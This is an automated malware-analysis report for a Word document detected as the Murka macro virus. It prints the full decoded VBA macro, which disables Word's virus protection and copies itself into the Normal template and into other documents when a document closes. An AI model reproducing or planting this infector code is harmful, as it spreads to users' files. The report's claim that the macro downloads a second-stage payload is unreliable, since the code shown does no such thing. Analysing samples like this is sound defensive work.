Murka — Office (OLE) malware analysis

Static analysis result for SHA-256 77bfdda3e5c03574…

MALICIOUS

Office (OLE)

39.5 KB Created: 2001-02-02 10:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: eb6f8eca85d96a8ea30b5c3667e9f2e7 SHA-1: 33109a07921d7c8a47dda7baa3e42308d1494529 SHA-256: 77bfdda3e5c035749003352505ba899d145ed7d845158426d9e3c108a21a0f39
80 Risk Score

Malware Insights

Murka · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Murka-1'. The embedded VBA macro, named 'macros.bas', contains comments explicitly referencing 'Murka' and appears to be designed to download and execute a second-stage payload upon document closure. The presence of VBA macros indicates a likely initial access vector via spearphishing attachment.

Heuristics 2

  • ClamAV: Doc.Trojan.Murka-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Murka-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9164 bytes
SHA-256: 426e5ffda97b07fb51e4cbd9079cc7ca0a6c284c1697a730166e86956fe6074e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - Ýòî ñàìûé ìàëåíüêèé èç âñåõ èçâåñòíûõ ÌàêðîÀíòèâèðóñíûõ ìîäóëåé!
'Ïðèíöèï äåéñòâèÿ: Çàãðóæàåòñÿ âìåñòå ñ äîêóìåíòîì è áëîêèðóåò
'                 ðàñïðîñòðàíåíèå çàðàæåííûõ ìîäóëåé
'
'Óñëîâèÿ ðàñïðîñòðàíåíèÿ: Freeware(Ñâîáîäíî)
'Äîñòîèíñòâà:             Êîððåêòíàÿ ðàáîòà, íàäåæíîñòü!
'Íåäîñòàòêè:              Ïîêà íå íàøåë
'
'"Âñå ýòî, êîíå÷íî, õîðîøî, íî ÿ íè õðåíà íå ïîíÿë, êàê åãî
' ìîæíî ïðåîáðåñòè?!" - ãíåâíî ñêàæåøü òû. Ìîæíî!
'Äåä MustDie âàì âñå ðàñêàæåò!
'Íåîáõîäèìî ëèøü îòêðûòü äîêóìåíò íà ïåðñîíàëüíîì
'êîìïå. ãäå óæå óñòàíîâëåí àíòèâèðóñíûé ìîäóëü Murka.
'
'Àâòîðó:   mustdie@chat.ru
'Murke:    murka@chat.ru
'Äàíèëîâó: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
  s = ActiveDocument.MailMerge.MailAddressFieldName
  Application.EnableCancelKey = wdCancelDisabled
  With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
  str = "Document_Close"
  With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Murka = .Lines(i, j)
  End With
  With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      NormalTemplate.Save
    End If
  End With
  With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      Randomize
      If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
      If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Äîêóìåíò" Then
      Else
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
      End If
    End If
  End With
  If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub




' Processing file: /opt/analyzer/scan_staging/9d96abaabd534310b252ea49987f1018.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5349 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' 	QuoteRem 0x0000 0x0048 "Murka - Ýòî ñàìûé ìàëåíüêèé èç âñåõ èçâåñòíûõ ÌàêðîÀíòèâèðóñíûõ ìîäóëåé!"
' Line #3:
' 	QuoteRem 0x0000 0x003D "Ïðèíöèï äåéñòâèÿ: Çàãðóæàåòñÿ âìåñòå ñ äîêóìåíòîì è áëîêèðóåò"
' Line #4:
' 	QuoteRem 0x0000 0x0033 "                 ðàñïðîñòðàíåíèå çàðàæåííûõ ìîäóëåé"
' Line #5:
' 	QuoteRem 0x0000 0x0000 ""
' Line #6:
' 	QuoteRem 0x0000 0x002B "Óñëîâèÿ ðàñïðîñòðàíåíèÿ: Freeware(Ñâîáîäíî)"
' Line #7:
' 	QuoteRem 0x0000 0x0037 "Äîñòîèíñòâà:             Êîððåêòíàÿ ðàáîòà, íàäåæíîñòü!"
' Line #8:
' 	QuoteRem 0x0000 0x0026 "Íåäîñòàòêè:              Ïîêà íå íàøåë"
' Line #9:
' 	QuoteRem 0x0000 0x0000 ""
' Line #10:
' 	QuoteRem 0x0000 0x003A ""Âñå ýòî, êîíå÷íî, õîðîøî, íî ÿ íè õðåíà íå ïîíÿë, êàê åãî"
' Line #11:
' 	QuoteRem 0x0000 0x0030 " ìîæíî ïðåîáðåñòè?!" - ãíåâíî ñêàæåøü òû. Ìîæíî!"
' Line #12:
' 	QuoteRem 0x0000 0x001D "Äåä MustDie âàì âñå ðàñêàæåò!"
' Line #13:
' 	QuoteRem 0x0000 0x0030 "Íåîáõîäèìî ëèøü îòêðûòü äîêóìåíò íà ïåðñîíàëüíîì"
' Line #14:
' 	QuoteRem 0x0000 0x
... (truncated)